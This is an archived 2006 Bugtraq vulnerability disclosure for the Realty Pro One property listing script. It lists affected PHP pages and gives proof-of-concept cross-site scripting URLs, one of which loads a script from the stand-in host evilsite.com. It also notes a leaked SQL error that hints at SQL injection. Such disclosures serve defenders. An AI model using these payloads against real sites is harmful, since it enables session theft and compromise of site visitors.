lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060523233832.32754.qmail@securityfocus.com> Date: 23 May 2006 23:38:32 -0000 From: luny@...fucktard.com To: bugtraq@...urityfocus.com Subject: Realty Pro One Property Listing Script Realty Pro One http://realtypro1.2run2.com/index.php Description: Realty Pro One is a powerful property listing tool with many features. Effected files: searchlookup.php images.php index_other.php request_info.php ?listingid Exploits & Vulns: XSS Vulnerability by the listingid variable: http://www.example.com/listings/?listingid=<SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT> Also outputs SQL Query error msg: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'This is remote text via xss.js located at evilsite.comPHPSESSID=f085540569ca117edda59a119e98fcc4 ORDER BY rl_re More XSS Vulnerabilities: http://www.example.com/search/searchlookup.php?propertyid=200 or [XSS] http://www.example.com/images.php?id=[XSS] http://www.example.com/listings/index_other.php?listingid=[XSS] By putting "> and <" infront and behind our script tags: http://www.example.com/listings/request_info.php?agentid=101005">[XSS]<"&listtype=homes&listingid=222003 No version # for this script was given on the website.